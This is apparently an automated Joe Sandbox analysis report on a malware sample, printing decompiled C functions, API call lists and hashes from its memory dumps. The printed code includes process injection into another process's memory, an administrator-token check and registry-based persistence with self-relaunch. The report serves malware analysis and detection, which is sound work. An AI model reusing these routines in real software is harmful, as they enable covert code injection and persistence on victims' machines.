                                                                                                                                  0x0040617f
                                                                                                                                  0x00406181
                                                                                                                                  0x00406181
                                                                                                                                  0x00000000
                                                                                                                                  0x00406185
                                                                                                                                  0x00406135
                                                                                                                                  0x00406106
                                                                                                                                  0x00000000
                                                                                                                                  0x004060b5
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                                                                  • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Read$AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438460464-0
                                                                                                                                  • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                                                                  • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                                                                  • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                                                                  • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406EDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0x0
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0x0
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}










                                                                                                                                  0x00406ee0
                                                                                                                                  0x00406eed
                                                                                                                                  0x00406f06
                                                                                                                                  0x00406f09
                                                                                                                                  0x00406f0f
                                                                                                                                  0x00406f15
                                                                                                                                  0x00406f1a
                                                                                                                                  0x00406f1c
                                                                                                                                  0x00406f1c
                                                                                                                                  0x00406f24
                                                                                                                                  0x00406f2c
                                                                                                                                  0x00406f36
                                                                                                                                  0x00406f36
                                                                                                                                  0x00406f3e
                                                                                                                                  0x00406f3e
                                                                                                                                  0x00406f44
                                                                                                                                  0x00406f4b
                                                                                                                                  0x00406f50
                                                                                                                                  0x00406f57
                                                                                                                                  0x00406f57
                                                                                                                                  0x00406f4b
                                                                                                                                  0x00406f5e

                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID: *p@
                                                                                                                                  • API String ID: 3429775523-2474123842
                                                                                                                                  • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                                                                  • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                                                                  • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}









                                                                                                                                  0x00406384
                                                                                                                                  0x00406395
                                                                                                                                  0x0040639a
                                                                                                                                  0x004063a9
                                                                                                                                  0x004063af
                                                                                                                                  0x004063b4
                                                                                                                                  0x004063f5
                                                                                                                                  0x004063f5
                                                                                                                                  0x004063b6
                                                                                                                                  0x004063b9
                                                                                                                                  0x004063d0
                                                                                                                                  0x004063d4
                                                                                                                                  0x00000000
                                                                                                                                  0x004063d6
                                                                                                                                  0x004063da
                                                                                                                                  0x004063f3
                                                                                                                                  0x004063fc
                                                                                                                                  0x00406406
                                                                                                                                  0x0040640a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004063f3
                                                                                                                                  0x004063d4
                                                                                                                                  0x0040640f
                                                                                                                                  0x00406386
                                                                                                                                  0x00406389
                                                                                                                                  0x00406389

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,?), ref: 0040638F
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,?), ref: 004063A9
                                                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                                                                  • Opcode Fuzzy Hash: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD65E3 Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00AD65F6
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00AD6610
                                                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 00AD6631
                                                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00AD6652
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                                                                  • Instruction ID: 875a3a0b4df4ff885560da046a088f97acb83b633a10b032d417b6ab0a04a86a
                                                                                                                                  • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                                                                  • Instruction Fuzzy Hash: D3117371600218BFDB219F65ED46F9B3FA8EB057A5F104035F90AE7251D7B1DD4086A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00408E26 Relevance: 4.6, APIs: 3, Instructions: 63fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
				char _v12;
				int _t13;
				DWORD* _t14;
				int _t15;
				void* _t20;
				void* _t23;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
				if(_t20 == 0xffffffff) {
					_t13 = 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						E00408DF1( &_v12);
						_t23 =  &_v12;
						_a12 = 8;
					}
					_t14 = _a24;
					 *_t14 = 0;
					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
					CloseHandle(_t20);
					_t13 = _t15;
				}
				return _t13;
			}









                                                                                                                                  0x00408e26
                                                                                                                                  0x00408e29
                                                                                                                                  0x00408e2a
                                                                                                                                  0x00408e6c
                                                                                                                                  0x00408e6e
                                                                                                                                  0x00408e79
                                                                                                                                  0x00408ebe
                                                                                                                                  0x00408e7b
                                                                                                                                  0x00408e7b
                                                                                                                                  0x00408e80
                                                                                                                                  0x00408e86
                                                                                                                                  0x00408e8c
                                                                                                                                  0x00408e8f
                                                                                                                                  0x00408e8f
                                                                                                                                  0x00408e96
                                                                                                                                  0x00408e9e
                                                                                                                                  0x00408eab
                                                                                                                                  0x00408eb4
                                                                                                                                  0x00408eba
                                                                                                                                  0x00408eba
                                                                                                                                  0x00408ec4

                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 00408EAB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                                                                    • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                                                                    • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3754425949-0
                                                                                                                                  • Opcode ID: 44991cf2ab018bd610f4aaec7180cbecb721f70a429b262d01f00541709b5165
                                                                                                                                  • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                                                                  • Opcode Fuzzy Hash: 44991cf2ab018bd610f4aaec7180cbecb721f70a429b262d01f00541709b5165
                                                                                                                                  • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004088B0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004088B0(intOrPtr _a4) {
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t101 = _a4;
				E0040EE2A(_t99, _t101, 0, 0x3e0);
				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
				_t98 = __imp__#6;
				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
				 *((intOrPtr*)(_t101 + 8)) = 0;
				 *((intOrPtr*)(_t101 + 0xc)) = 0;
				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
				 *((intOrPtr*)(_t101 + 0x100)) = 0;
				 *((intOrPtr*)(_t101 + 0x104)) = 0;
				 *((intOrPtr*)(_t101 + 0x108)) = 0;
				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
				 *((intOrPtr*)(_t101 + 0x110)) = 0;
				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
				return _t98;
			}






                                                                                                                                  0x004088b1
                                                                                                                                  0x004088bf
                                                                                                                                  0x004088c9
                                                                                                                                  0x004088d4
                                                                                                                                  0x004088df
                                                                                                                                  0x004088ea
                                                                                                                                  0x004088f5
                                                                                                                                  0x00408900
                                                                                                                                  0x0040890b
                                                                                                                                  0x00408916
                                                                                                                                  0x00408921
                                                                                                                                  0x0040892c
                                                                                                                                  0x00408937
                                                                                                                                  0x0040893d
                                                                                                                                  0x00408945
                                                                                                                                  0x0040894c
                                                                                                                                  0x00408953
                                                                                                                                  0x0040895a
                                                                                                                                  0x0040895d
                                                                                                                                  0x00408960
                                                                                                                                  0x00408967
                                                                                                                                  0x0040896e
                                                                                                                                  0x00408978
                                                                                                                                  0x0040897f
                                                                                                                                  0x00408986
                                                                                                                                  0x0040898d
                                                                                                                                  0x00408994
                                                                                                                                  0x0040899b
                                                                                                                                  0x004089a2
                                                                                                                                  0x004089a9
                                                                                                                                  0x004089b0
                                                                                                                                  0x004089b7
                                                                                                                                  0x004089be
                                                                                                                                  0x004089c5
                                                                                                                                  0x004089cc
                                                                                                                                  0x004089d3
                                                                                                                                  0x004089da
                                                                                                                                  0x004089e1
                                                                                                                                  0x004089e8
                                                                                                                                  0x004089ef
                                                                                                                                  0x004089f6
                                                                                                                                  0x00408a00
                                                                                                                                  0x00408a0a
                                                                                                                                  0x00408a14
                                                                                                                                  0x00408a1e
                                                                                                                                  0x00408a28
                                                                                                                                  0x00408a32
                                                                                                                                  0x00408a3c
                                                                                                                                  0x00408a46
                                                                                                                                  0x00408a50
                                                                                                                                  0x00408a5a
                                                                                                                                  0x00408a64
                                                                                                                                  0x00408a6e
                                                                                                                                  0x00408a78
                                                                                                                                  0x00408a82
                                                                                                                                  0x00408a8c
                                                                                                                                  0x00408a92
                                                                                                                                  0x00408a98
                                                                                                                                  0x00408aa2
                                                                                                                                  0x00408aac
                                                                                                                                  0x00408ab6
                                                                                                                                  0x00408ac0
                                                                                                                                  0x00408ac6
                                                                                                                                  0x00408acc
                                                                                                                                  0x00408ad2
                                                                                                                                  0x00408ad8
                                                                                                                                  0x00408adf
                                                                                                                                  0x00408ae9
                                                                                                                                  0x00408af3
                                                                                                                                  0x00408afd
                                                                                                                                  0x00408b07
                                                                                                                                  0x00408b11
                                                                                                                                  0x00408b1b
                                                                                                                                  0x00408b25
                                                                                                                                  0x00408b2f
                                                                                                                                  0x00408b39
                                                                                                                                  0x00408b43
                                                                                                                                  0x00408b4d
                                                                                                                                  0x00408b57
                                                                                                                                  0x00408b61
                                                                                                                                  0x00408b6b
                                                                                                                                  0x00408b75
                                                                                                                                  0x00408b7f
                                                                                                                                  0x00408b89
                                                                                                                                  0x00408b93
                                                                                                                                  0x00408b9d
                                                                                                                                  0x00408ba7
                                                                                                                                  0x00408bb2

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 44bd52e04b48cb4f37f88c1faa2861bd1aa750469feb028cdba60f87f31a69ab
                                                                                                                                  • Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
                                                                                                                                  • Opcode Fuzzy Hash: 44bd52e04b48cb4f37f88c1faa2861bd1aa750469feb028cdba60f87f31a69ab
                                                                                                                                  • Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                  • Instruction ID: 6f27976c2e8aaa52d592de10d0f875c698b2079f4cd494174258d198b17186d8
                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                  • Instruction Fuzzy Hash: BC01A7766006048FDF21CF64C804FAA33F6EB85315F4544AAD54797342E774A9418B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD9EA0 Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00AD9E6D
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00AD9FE1
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00AD9FF2
                                                                                                                                  • lstrcat.KERNEL32(?,0041070C), ref: 00ADA004
                                                                                                                                  • GetFileAttributesExA.KERNEL32(?,?,?), ref: 00ADA054
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00ADA09F
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00ADA0D6
                                                                                                                                  • lstrcpy.KERNEL32 ref: 00ADA12F
                                                                                                                                  • lstrlen.KERNEL32(00000022), ref: 00ADA13C
                                                                                                                                  • GetTempPathA.KERNEL32(000001F4,?), ref: 00AD9F13
                                                                                                                                    • Part of subcall function 00AD7029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 00AD7081
                                                                                                                                    • Part of subcall function 00AD6F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\uvfipga,00AD7043), ref: 00AD6F4E
                                                                                                                                    • Part of subcall function 00AD6F30: GetProcAddress.KERNEL32(00000000), ref: 00AD6F55
                                                                                                                                    • Part of subcall function 00AD6F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00AD6F7B
                                                                                                                                    • Part of subcall function 00AD6F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00AD6F92
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 00ADA1A2
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00ADA1C5
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 00ADA214
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 00ADA21B
                                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00ADA265
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00ADA29F
                                                                                                                                  • lstrcat.KERNEL32(?,00410A34), ref: 00ADA2C5
                                                                                                                                  • lstrcat.KERNEL32(?,00000022), ref: 00ADA2D9
                                                                                                                                  • lstrcat.KERNEL32(?,00410A34), ref: 00ADA2F4
                                                                                                                                  • wsprintfA.USER32 ref: 00ADA31D
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00ADA345
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00ADA364
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 00ADA387
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 00ADA398
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00ADA1D1
                                                                                                                                    • Part of subcall function 00AD9966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00AD999D
                                                                                                                                    • Part of subcall function 00AD9966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00AD99BD
                                                                                                                                    • Part of subcall function 00AD9966: RegCloseKey.ADVAPI32(?), ref: 00AD99C6
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 00ADA3DB
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 00ADA3E2
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 00ADA41D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
